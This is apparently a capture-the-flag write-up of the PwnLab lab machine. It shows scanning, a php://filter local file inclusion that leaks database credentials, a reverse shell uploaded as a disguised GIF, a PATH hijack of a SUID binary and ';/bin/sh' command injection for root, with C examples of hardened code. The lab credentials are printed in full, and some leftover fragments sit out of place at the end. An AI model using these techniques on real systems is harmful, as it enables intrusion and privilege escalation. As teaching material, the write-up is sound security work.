nikto -h 192.168.10.14
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.10.14
+ Target Hostname: 192.168.10.14
+ Target Port: 80
+ Start Time: 2022-03-30 10:02:03 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.1.1/images/".
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ Cookie PHPSESSID created without the httponly flag
+ /config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 6544 items checked: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2022-03-30 10:02:31 (GMT5.5) (28 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Nikto reports a /config.php file, which could contain database IDs and passwords.
3. Initial Foothold
3.1 Local File Inclusion
Accessing the web page, we see three links: Home, Login, and Upload.
As we visit each of them, the URL gets ?page=name appended. For example, going to the Login page changes the URL from http://192.168.10.14 to http://192.168.10.14/?page=login, and similarly for Upload.
Trying to access config.php directly by appending it to the URL (http://192.168.10.14/?page=config), and also with a null byte (http://192.168.10.14/?page=config%00), does not yield any results.
Next we try the php://filter wrapper with base64 encoding: http://192.168.10.14/?page=php://filter/read=convert.base64-encode/resource=config, which gives us the base64-encoded config.php page.
Decoding it, we get the login credentials for the MySQL database.
We dump the database using the credentials root : H4u%QJ_H99 obtained from config.php, looking for possible usernames and/or passwords.
mysql -h 192.168.10.14 -u root -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 62
Server version: 5.5.47-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Users |
+--------------------+
2 rows in set (0.002 sec)
MySQL [(none)]> use Users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [Users]> show tables;
+-----------------+
| Tables_in_Users |
+-----------------+
| users |
+-----------------+
1 row in set (0.003 sec)
MySQL [Users]> select * from users;
+------+------------------+
| user | pass |
+------+------------------+
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
+------+------------------+
3 rows in set (0.002 sec)
We get three users, kent, mike and kane, with their base64-encoded passwords.
Decoding them, we get possible credentials for logging in to the web page and/or the box:
kent : JWzXuBJJNy
mike : SIfdsTEn6I
kane : iSv5Ym2GRo
Using any of these credentials, we can log in to the web portal, which takes us to the Upload page.
3.3 Reverse shell
We find that there are restrictions on uploading files: it accepts only image files.
We can rename the .php extension of the reverse shell to .gif: php-reverse-shell.gif
We also add the GIF89a header at the start of the file, from a text editor, so that the magic bytes (the first bytes that identify the type of a file) make it look like a .gif file.
Uploading the modified reverse shell goes through.
We can find the uploaded file by going to the /upload directory.
Navigating to our uploaded GIF file produces an error.
There seem to be more filters in place.
3.4 Filter Bypass
In order to find out how files are processed, we need the source code.
We get the index.php source from http://192.168.10.14/?page=php://filter/read=convert.base64-encode/resource=index and base64-decode it:
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
    include("lang/".$_COOKIE['lang']);
}
// Not implemented yet.
?>
<html>
<head>
    <title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
    <img src="images/pwnlab.png"><br />
    [ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
    <hr/><br/>
    <?php
    if (isset($_GET['page']))
    {
        include($_GET['page'].".php");
    }
    else
    {
        echo "Use this server to upload and share image files inside the intranet";
    }
    ?>
</center>
</body>
</html>
Here we see a cookie attribute lang, intended for multilingual support. As this feature is not yet implemented, the server never sets the cookie, so we have to set it manually ourselves.
Its value is passed straight to an include() call, so there might be another LFI here: a cookie value of lang=anypath gets included from the lang/ directory.
We capture the request to our uploaded file in Burp Suite and modify the cookie value to the path of our uploaded reverse shell.
We can try to switch users with the credentials obtained from the database.
We are able to switch to user kane with the credentials kane : iSv5Ym2GRo.
sudo -l gives no results, as sudo is not available on the box.
kane@pwnlab:/home/mike$ sudo -l
bash: sudo: command not found
Using the SUID bit to switch to another user: a file with the SUID bit set always executes as the user who owns the file, regardless of the user running the command.
find / -perm -04000 -type f -ls 2>/dev/null shows us the files with the SUID bit set that the current user can find:
kane@pwnlab:~$ find / -perm -04000 -type f -ls 2>/dev/null
3603 36 -rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
4989 40 -rwsr-xr-x 1 root root 38868 Nov 19 2015 /bin/su
3604 28 -rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
18810 96 -rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
27221 8 -rwsr-sr-x 1 mike mike 5148 Mar 17 2016 /home/kane/msgmike
5009 40 -rwsr-xr-x 1 root root 38740 Nov 19 2015 /usr/bin/newgrp
354 52 -rwsr-xr-x 1 root root 52344 Nov 19 2015 /usr/bin/chfn
17895 52 -rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
358 52 -rwsr-xr-x 1 root root 53112 Nov 19 2015 /usr/bin/passwd
18898 96 -rwsr-sr-x 1 root mail 96192 Feb 11 2015 /usr/bin/procmail
355 44 -rwsr-xr-x 1 root root 43576 Nov 19 2015 /usr/bin/chsh
357 80 -rwsr-xr-x 1 root root 78072 Nov 19 2015 /usr/bin/gpasswd
11725 8 -rwsr-xr-x 1 root root 5372 Feb 24 2014 /usr/lib/eject/dmcrypt-get-device
2813 12 -rwsr-xr-x 1 root root 9540 Feb 11 2016 /usr/lib/pt_chown
18078 356 -rwsr-xr-- 1 root messagebus 362672 Aug 2 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
18859 552 -rwsr-xr-x 1 root root 562536 Jan 13 2016 /usr/lib/openssh/ssh-keysign
17980 1060 -rwsr-xr-x 1 root root 1085236 Mar 13 2016 /usr/sbin/exim4
The files in /bin, /usr/bin and /usr/lib are unlikely to help us with privesc via SUID. There is another, more interesting file, msgmike in /home/kane, owned by mike.
Checking the file type using file:
kane@pwnlab:/$ cd /home/kane
kane@pwnlab:~$ file msgmike
msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped
The file is a setuid ELF executable. Executing it gives us an error:
kane@pwnlab:~$ ./msgmike
cat: /home/mike/msg.txt: No such file or directory
4.2 PATH Variable
From the error shown above, we see that the executable tries to read a file called msg.txt using the cat command.
Checking the PATH variable as well as the location of the cat command:
kane@pwnlab:~$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
kane@pwnlab:~$ which cat
/bin/cat
We can see that the cat command lives in the third location (/bin) of the PATH variable.
The lookup checks the first two locations, does not find a cat command there, and moves on to /bin.
To exploit the PATH variable, we need to provide a fake cat command that spawns a shell when called, and its directory must come before the real cat's directory in the PATH variable so that it is found first.
We create an executable file named cat in the current directory that spawns a bash shell.
With the current directory placed at the front of the PATH variable, our cat is found first when msgmike runs the command, and we get a shell as user mike.
kane@pwnlab:~$ ./msgmike
mike@pwnlab:~$
We became user mike because the SUID file msgmike is owned by mike.
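As an added illustration (not code from the PwnLab box, whose msgmike source is not shown on the page), the C below models the PATH search described above and contrasts the assumed system("cat ...") pattern with a version that reads the file itself; the path /home/mike/msg.txt is taken from the error message above.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

/* Model of the PATH lookup described above: walk the colon-separated list
   left to right and return the first "dir/cmd" that is a regular, executable
   file, or NULL. This is the search that resolves msgmike's bare "cat". */
const char *resolve_in_path(const char *cmd, const char *path) {
    static char found[4096];
    struct stat st;
    char copy[4096];
    snprintf(copy, sizeof copy, "%s", path);
    for (char *dir = strtok(copy, ":"); dir; dir = strtok(NULL, ":")) {
        snprintf(found, sizeof found, "%s/%s", dir, cmd);
        if (stat(found, &st) == 0 && S_ISREG(st.st_mode) && (st.st_mode & S_IXUSR))
            return found;
    }
    return NULL;
}

/* Assumed reconstruction of msgmike's pattern (the page shows no source):
   a shell is spawned and "cat" is resolved through the caller's PATH. */
void show_message_unsafe(void) {
    system("cat /home/mike/msg.txt");
}

/* Hardened: copy the file ourselves. No shell and no PATH lookup, so a
   caller-controlled environment has nothing to redirect. Returns bytes copied, -1 on error. */
long show_message_safe(const char *path, FILE *out) {
    char buf[4096];
    size_t n; long total = 0;
    FILE *in = fopen(path, "r");
    if (!in) return -1;
    while ((n = fread(buf, 1, sizeof buf, in)) > 0) {
        fwrite(buf, 1, n, out);
        total += (long)n;
    }
    fclose(in);
    return total;
}

int main(void) {
    const char *hit = resolve_in_path("cat", "/usr/local/bin:/usr/bin:/bin");
    printf("cat resolves to: %s\n", hit ? hit : "(not found)");
    return show_message_safe("/home/mike/msg.txt", stdout) < 0;
}
```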
4.3 Command Injection
We find another vulnerable executable in mike's home folder called msg2root, with SUID set and owned by root.
mike@pwnlab:~$ cd /home/mike
mike@pwnlab:/home/mike$ ls
msg2root
mike@pwnlab:/home/mike$ file msg2root
msg2root: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=60bf769f8fbbfd406c047f698b55d2668fae14d3, not stripped
mike@pwnlab:/home/mike$ ls -la
total 28
drwxr-x--- 2 mike mike 4096 Mar 17 2016 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 mike mike 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17 2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17 2016 msg2root
-rw-r--r-- 1 mike mike 675 Mar 17 2016 .profile
Executing msg2root:
mike@pwnlab:/home/mike$ ./msg2root
Message for root:
We find that whatever the user enters is passed to the /bin/echo command and eventually appended to a messages.txt file. Command injection is possible here.
We can directly pass ;/bin/sh as the message to spawn a shell as root: the ; breaks out of the echo command, and /bin/sh then runs with root privileges.
mike@pwnlab:/home/mike$ ./msg2root
Message for root: ;/bin/sh
whoami
root
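As an added example (again not the box's code; msg2root's source is not on the page), the C below contrasts the assumed "/bin/echo ... >> messages.txt" shell pattern with a version that appends the message without a shell, so that a message of ;/bin/sh is stored as text instead of executed. The location of messages.txt is an assumption.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MESSAGE_FILE "/root/messages.txt" /* assumed; the page only says messages.txt */

/* Assumed reconstruction of msg2root's pattern (the page shows no source): the message
   is spliced into a shell command line, so ';' ends echo and the rest runs as root. */
void append_message_unsafe(const char *msg) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "/bin/echo %s >> " MESSAGE_FILE, msg);
    system(cmd);
}

/* Hardened: append the message ourselves. No shell parses it, so ';', '|' and '$(...)'
   are just bytes in the file. Returns bytes written (message plus newline), -1 on error. */
long append_message_safe(const char *path, const char *msg) {
    size_t len = strlen(msg);
    FILE *f = fopen(path, "a");
    if (!f) return -1;
    if (fwrite(msg, 1, len, f) != len || fputc('\n', f) == EOF) { fclose(f); return -1; }
    fclose(f);
    return (long)len + 1;
}

/* Copies the last line of path into buf (newline stripped); returns its length, or -1. */
long last_message(const char *path, char *buf, size_t bufsz) {
    char line[1024];
    long len = -1;
    FILE *f = fopen(path, "r");
    if (!f) return -1;
    while (fgets(line, sizeof line, f)) {
        line[strcspn(line, "\n")] = '\0';
        snprintf(buf, bufsz, "%s", line);
        len = (long)strlen(buf);
    }
    fclose(f);
    return len;
}

int main(void) {
    char msg[256], last[256];
    printf("Message for root: ");
    if (!fgets(msg, sizeof msg, stdin)) return 1;
    msg[strcspn(msg, "\n")] = '\0';
    if (append_message_safe(MESSAGE_FILE, msg) < 0) { perror(MESSAGE_FILE); return 1; }
    return last_message(MESSAGE_FILE, last, sizeof last) < 0;
}
```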
This is a misconfiguration known as Local File Inclusion (LFI); it allows an attacker to manipulate the target's web server by including malicious files remotely, or even to access sensitive files present on that server. You can read more about LFI
Trying to upload a php-reverse-shell.php reverse shell from (make sure to change the IP and port)
In order to execute any Linux command, the shell checks the directories listed in the PATH variable for the command. If the command is not found in the first location, it moves on to the next, and so on. Read more about it